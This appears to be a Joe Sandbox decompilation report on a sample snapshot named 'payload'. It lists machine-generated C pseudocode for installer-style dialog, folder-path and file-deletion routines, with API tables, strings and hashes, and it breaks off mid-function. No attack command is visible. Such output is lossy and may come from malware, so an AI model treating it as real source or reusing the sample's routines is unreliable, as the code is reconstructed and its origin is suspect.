				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x423728;
				_t282 = 0;
				_v24 =  *0x423710 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x423719 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E004047DD(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x423718) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x41fcec;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x41fd00;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x41fcec = _t282;
								 *0x41fd00 = _t282;
								 *0x423760 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x423719 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E0040485D();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x41fd00;
									_t195 =  *0x423728;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42372c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x422edc; // 0x6142c1
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E00404798(0x3ff, 0xfffffffb, E004047B0(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42372c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x41fd00);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x423760 = _t306;
					 *0x41fd00 = GlobalAlloc(0x40,  *0x42372c << 2);
					_t252 = LoadBitmapA( *0x423700, 0x6e);
					 *0x41fcf4 =  *0x41fcf4 | 0xffffffff;
					_t313 = _t252;
					 *0x41fcfc = SetWindowLongA(_v8, 0xfffffffc, E00404E86);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x41fcec = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x41fcec);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							_t279 = SendMessageA(_v12, 0x143, _t282, E00405D1B(_t282, _t314, _t318, _t282, _t260)); // executed
							SendMessageA(_v12, 0x151, _t279, _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00403EDE(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00403EDE(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42372c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84); // executed
										 *( *0x41fd00 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v32 = 1;
									 *( *0x41fd00 + _t316 * 4) = _t276;
									_t284 =  *( *0x41fd00 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42372c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F13(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F13(_v12);
								L91:
								return E00403F45(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x0040489e
0x004048af
0x004048b4
0x004048bc
0x004048c2
0x004048ca
0x004048d8
0x004048db
0x00404afb
0x00404b02
0x00404b16
0x00404b04
0x00404b06
0x00404b09
0x00404b0a
0x00404b11
0x00404b11
0x00404b22
0x00404b30
0x00404b33
0x00404b49
0x00404bbe
0x00404bc1
0x00404bc3
0x00404bcd
0x00404bdb
0x00404bdb
0x00404bdd
0x00404be7
0x00404bed
0x00404bf0
0x00404bf3
0x00404c0e
0x00404bf5
0x00404bff
0x00404bff
0x00404bf3
0x00404be7
0x00000000
0x00404bc1
0x00404b4e
0x00404b59
0x00404b5e
0x00404b65
0x00404b6a
0x00404b6e
0x00404b79
0x00404b79
0x00404b7d
0x00404b81
0x00404b85
0x00404b98
0x00404b87
0x00404b87
0x00404b8e
0x00404b94
0x00404b90
0x00404b90
0x00404b90
0x00404b8e
0x00404b9c
0x00404b9e
0x00404bb1
0x00404bb4
0x00404bb7
0x00404bb7
0x00404b81
0x00000000
0x00404b6e
0x00404b50
0x00404b57
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c11
0x00404c11
0x00404c18
0x00404c89
0x00404c91
0x00404c99
0x00404c99
0x00404ca2
0x00404ca4
0x00404cab
0x00404cae
0x00404cae
0x00404cb4
0x00404cbb
0x00404cbe
0x00404cbe
0x00404cc4
0x00404cca
0x00404cd0
0x00404cd0
0x00404cdd
0x00404e33
0x00404e3a
0x00404e57
0x00404e5d
0x00404e6f
0x00404e6f
0x00000000
0x00404ce3
0x00404ce5
0x00404cea
0x00404cef
0x00404cf4
0x00404cf6
0x00404cf6
0x00404cf7
0x00404cf8
0x00404cfa
0x00404cfa
0x00404d02
0x00404d43
0x00404d45
0x00404d55
0x00404d58
0x00404d5d
0x00404d64
0x00404d67
0x00404e09
0x00404e0f
0x00404e15
0x00404e1d
0x00404e2e
0x00404e2e
0x00000000
0x00404e1d
0x00404d6d
0x00404d70
0x00404d76
0x00404d7b
0x00404d7d
0x00404d7f
0x00404d85
0x00404d8c
0x00404d91
0x00404d98
0x00404d9b
0x00404d9b
0x00404da2
0x00404dae
0x00404db2
0x00404db4
0x00404db4
0x00404da4
0x00404da6
0x00404da6
0x00404dd4
0x00404de0
0x00404def
0x00404def
0x00404df1
0x00404df4
0x00404dfd
0x00000000
0x00404d04
0x00404d0f
0x00404d12
0x00404d17
0x00404d19
0x00404d1d
0x00404d2d
0x00404d37
0x00404d39
0x00404d3c
0x00000000
0x00000000
0x00000000
0x00000000
0x00404d1f
0x00404d1f
0x00404d25
0x00404d27
0x00404d27
0x00404d28
0x00404d29
0x00000000
0x00404d1f
0x00404d02
0x00404cdd
0x00404c20
0x00000000
0x00404c36
0x00404c40
0x00404c45
0x00000000
0x00000000
0x00404c57
0x00404c5c
0x00404c68
0x00404c68
0x00404c6a
0x00404c79
0x00404c7b
0x00404c7f
0x00404c82
0x00000000
0x00404c82
0x00404c20
0x004048e1
0x004048e6
0x004048ef
0x004048f6
0x00404904
0x0040490f
0x00404915
0x00404923
0x00404937
0x0040493c
0x00404949
0x0040494e
0x00404964
0x00404975
0x00404982
0x00404982
0x00404985
0x0040498b
0x0040498d
0x00404990
0x00404995
0x0040499a
0x0040499c
0x0040499c
0x004049b0
0x004049bc
0x004049bc
0x004049be
0x004049bf
0x004049c4
0x004049c7
0x004049ca
0x004049ce
0x004049d3
0x004049d8
0x004049dc
0x004049e1
0x004049e6
0x004049e8
0x004049f0
0x00404aba
0x00404acd
0x00000000
0x004049f6
0x004049f9
0x004049fc
0x004049ff
0x004049ff
0x00404a05
0x00404a0b
0x00404a0e
0x00404a14
0x00404a15
0x00404a1a
0x00404a23
0x00404a2a
0x00404a2d
0x00404a30
0x00404a33
0x00404a6f
0x00404a90
0x00404a98
0x00404a71
0x00404a7e
0x00404a7e
0x00404a35
0x00404a38
0x00404a47
0x00404a51
0x00404a59
0x00404a60
0x00404a68
0x00404a68
0x00404a33
0x00404a9e
0x00404a9f
0x00404aab
0x00404aab
0x00404ab8
0x00404ad3
0x00404ad7
0x00404af4
0x00404af9
0x00000000
0x00404ad9
0x00404ade
0x00404ae7
0x00404e71
0x00404e83
0x00404e83
0x00404ad7
0x00000000
0x00404ab8
0x004049f0

APIs

GetDlgItem.USER32(?,000003F9), ref: 004048A7
GetDlgItem.USER32(?,00000408), ref: 004048B2
GlobalAlloc.KERNEL32(00000040,?), ref: 004048FC
LoadBitmapA.USER32 ref: 0040490F
SetWindowLongA.USER32(?,000000FC,00404E86), ref: 00404928
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040493C
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 0040494E
SendMessageA.USER32 ref: 00404964
SendMessageA.USER32 ref: 00404970
SendMessageA.USER32 ref: 00404982
DeleteObject.GDI32(00000000), ref: 00404985
SendMessageA.USER32 ref: 004049B0
SendMessageA.USER32 ref: 004049BC
SendMessageA.USER32 ref: 00404A51
SendMessageA.USER32 ref: 00404A7C
SendMessageA.USER32 ref: 00404A90
GetWindowLongA.USER32(?,000000F0), ref: 00404ABF
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404ACD
ShowWindow.USER32(?,00000005), ref: 00404ADE
SendMessageA.USER32 ref: 00404BDB
SendMessageA.USER32 ref: 00404C40
SendMessageA.USER32 ref: 00404C55
SendMessageA.USER32 ref: 00404C79
SendMessageA.USER32 ref: 00404C99
ImageList_Destroy.COMCTL32(?), ref: 00404CAE
GlobalFree.KERNEL32(?), ref: 00404CBE
SendMessageA.USER32 ref: 00404D37
SendMessageA.USER32 ref: 00404DE0
SendMessageA.USER32 ref: 00404DEF
InvalidateRect.USER32(?,00000000,00000001), ref: 00404E0F
ShowWindow.USER32(?,00000000), ref: 00404E5D
GetDlgItem.USER32(?,000003FE), ref: 00404E68
ShowWindow.USER32(00000000), ref: 00404E6F

Strings

, xrefs: 00404E47
M, xrefs: 00404A38
N, xrefs: 00404B19

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 8b0289ef19e9e7d4f6956f04046df2f7fedd754f5cc9c605ccbb11d5e9afe659
Instruction ID: e7c54df8ad39b376662a796d960b289492e5a6982c1727c2c37b81bede79f7f2
Opcode Fuzzy Hash: 8b0289ef19e9e7d4f6956f04046df2f7fedd754f5cc9c605ccbb11d5e9afe659
Instruction Fuzzy Hash: 43025EB0A00209AFEF109F54DC85AAE7BB5FB84315F10817AF611B62E1D7789E42DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00405D1B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00405D1B(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t37;
				CHAR* _t38;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t70;
				signed int _t75;
				signed int _t76;
				intOrPtr _t80;
				char _t82;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t96;
				signed int _t98;
				void* _t99;

				_t89 = __esi;
				_t86 = __edi;
				_t64 = __ebx;
				_t37 = _a8;
				if(_t37 < 0) {
					_t80 =  *0x422edc; // 0x6142c1
					_t37 =  *(_t80 - 4 + _t37 * 4);
				}
				_push(_t64);
				_t75 =  *0x423738 + _t37;
				_t38 = 0x4226a0;
				_push(_t89);
				_push(_t86);
				_t87 = 0x4226a0;
				if(_a4 >= 0x4226a0 && _a4 - 0x4226a0 < 0x800) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t82 =  *_t75;
					if(_t82 == 0) {
						break;
					}
					__eflags = _t87 - _t38 - 0x400;
					if(_t87 - _t38 >= 0x400) {
						break;
					}
					_t75 = _t75 + 1;
					__eflags = _t82 - 4;
					_a8 = _t75;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t82;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t75;
							_t87 =  &(_t87[1]);
							_t75 = _t75 + 1;
						}
						continue;
					}
					_t40 =  *(_t75 + 1);
					_t76 =  *_t75;
					_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t76 | 0x00000080;
					_t70 = _t76;
					_v24 = _t70;
					__eflags = _t82 - 2;
					_v20 = _t40 | 0x00000080;
					_v16 = _t40;
					if(_t82 != 2) {
						__eflags = _t82 - 3;
						if(_t82 != 3) {
							__eflags = _t82 - 1;
							if(_t82 == 1) {
								__eflags = (_t40 | 0xffffffff) - _t96;
								E00405D1B(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
							}
							L42:
							_t41 = lstrlenA(_t87);
							_t75 = _a8;
							_t87 =  &(_t87[_t41]);
							_t38 = 0x4226a0;
							continue;
						}
						__eflags = _t96 - 0x1d;
						if(_t96 != 0x1d) {
							__eflags = (_t96 << 0xa) + 0x424000;
							E00405CF9(_t87, (_t96 << 0xa) + 0x424000);
						} else {
							E00405C57(_t87,  *0x423708);
						}
						__eflags = _t96 + 0xffffffeb - 7;
						if(_t96 + 0xffffffeb < 7) {
							L33:
							E00405F64(_t87);
						}
						goto L42;
					}
					_t98 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x423784;
						if( *0x423784 != 0) {
							_t98 = 4;
						}
						__eflags = _t70;
						if(_t70 >= 0) {
							__eflags = _t70 - 0x25;
							if(_t70 != 0x25) {
								__eflags = _t70 - 0x24;
								if(_t70 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x400);
									_t98 = 0;
								}
								while(1) {
									__eflags = _t98;
									if(_t98 == 0) {
										goto L30;
									}
									_t52 =  *0x423704;
									_t98 = _t98 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L26:
										_t54 = SHGetSpecialFolderLocation( *0x423708,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t87);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t56 =  *_t52( *0x423708,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t56;
									if(_t56 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x400);
							goto L30;
						} else {
							_t73 = (_t70 & 0x0000003f) +  *0x423738;
							E00405BE0(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x423738, _t87, _t70 & 0x00000040); // executed
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405D1B(_t73, _t87, _t98, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t38;
				}
				return E00405CF9(_a4, _t38);
			}

0x00405d1b
0x00405d1b
0x00405d1b
0x00405d21
0x00405d26
0x00405d28
0x00405d37
0x00405d37
0x00405d3f
0x00405d40
0x00405d42
0x00405d4a
0x00405d4b
0x00405d4c
0x00405d4e
0x00405d65
0x00405d68
0x00405d68
0x00405f41
0x00405f41
0x00405f45
0x00000000
0x00000000
0x00405d75
0x00405d7b
0x00000000
0x00000000
0x00405d81
0x00405d82
0x00405d85
0x00405d88
0x00405f34
0x00405f3e
0x00405f40
0x00405f40
0x00405f36
0x00405f38
0x00405f3a
0x00405f3b
0x00405f3b
0x00000000
0x00405f34
0x00405d8e
0x00405d92
0x00405da2
0x00405da6
0x00405dad
0x00405db0
0x00405db4
0x00405dba
0x00405dbd
0x00405dc0
0x00405dc3
0x00405ede
0x00405ee1
0x00405f11
0x00405f14
0x00405f19
0x00405f1d
0x00405f1d
0x00405f22
0x00405f23
0x00405f28
0x00405f2b
0x00405f2d
0x00000000
0x00405f2d
0x00405ee3
0x00405ee6
0x00405efb
0x00405f02
0x00405ee8
0x00405eef
0x00405eef
0x00405f0a
0x00405f0d
0x00405ed6
0x00405ed7
0x00405ed7
0x00000000
0x00405f0d
0x00405dcb
0x00405dcc
0x00405dd2
0x00405dd4
0x00405dee
0x00405dee
0x00405df5
0x00405df5
0x00405dfc
0x00405e00
0x00405e00
0x00405e01
0x00405e03
0x00405e3c
0x00405e3f
0x00405e4f
0x00405e52
0x00405e5a
0x00405e60
0x00405e60
0x00405ebc
0x00405ebc
0x00405ebe
0x00000000
0x00000000
0x00405e64
0x00405e6b
0x00405e6c
0x00405e6e
0x00405e88
0x00405e96
0x00405e9c
0x00405e9e
0x00405eb9
0x00405eb9
0x00405eb9
0x00000000
0x00405eb9
0x00405ea4
0x00405eaf
0x00405eb5
0x00405eb7
0x00000000
0x00000000
0x00000000
0x00405eb7
0x00405e70
0x00405e73
0x00000000
0x00000000
0x00405e82
0x00405e84
0x00405e86
0x00000000
0x00000000
0x00000000
0x00405e86
0x00000000
0x00405ebc
0x00405e47
0x00000000
0x00405e05
0x00405e0a
0x00405e20
0x00405e25
0x00405e28
0x00405ec5
0x00405ec5
0x00405ec9
0x00405ed1
0x00405ed1
0x00000000
0x00405ec9
0x00405e32
0x00405ec0
0x00405ec0
0x00405ec3
0x00000000
0x00000000
0x00000000
0x00405ec3
0x00405e03
0x00405dd6
0x00405dda
0x00000000
0x00000000
0x00405ddc
0x00405de0
0x00000000
0x00000000
0x00405de2
0x00405de6
0x00000000
0x00405de8
0x00405de8
0x00000000
0x00405de8
0x00405de6
0x00405f4b
0x00405f55
0x00405f61
0x00405f61
0x00000000

APIs

GetVersion.KERNEL32(?,0041F4E8,00000000,00404F4A,0041F4E8,00000000), ref: 00405DCC
GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E47
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E5A
SHGetSpecialFolderLocation.SHELL32(?,0040E8C0), ref: 00405E96
SHGetPathFromIDListA.SHELL32(0040E8C0,Call), ref: 00405EA4
CoTaskMemFree.OLE32(0040E8C0), ref: 00405EAF
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED1
lstrlenA.KERNEL32(Call,?,0041F4E8,00000000,00404F4A,0041F4E8,00000000), ref: 00405F23

Strings

Call, xrefs: 00405D42, 00405E14, 00405E31, 00405E46, 00405E59, 00405E75, 00405EA0, 00405ED0, 00405ED6, 00405EEE, 00405F01, 00405F1C, 00405F22, 00405F2D, 00405F57
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E16
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405ECB

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1230650788
Opcode ID: fb8208971b7bef3eab874112c295b4c22afd955e6dbc7abb81a1d2e78964ecc6
Instruction ID: 70d043a0125fa0970afc212ad974551980140434863585fcf13b89b4fbf53fe2
Opcode Fuzzy Hash: fb8208971b7bef3eab874112c295b4c22afd955e6dbc7abb81a1d2e78964ecc6
Instruction Fuzzy Hash: AD61F471A04A01ABDF205F64DC88B7F3BA8DB41305F50803BE941B62D0D27D4A82DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040559B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040559B(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405859(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x423788 =  *0x423788 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405CF9(0x420d10, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E004057B2(_t73);
					} else {
						lstrcatA(0x420d10, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x409014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
						_t40 = FindFirstFileA(0x420d10,  &_v336); // executed
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405796( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
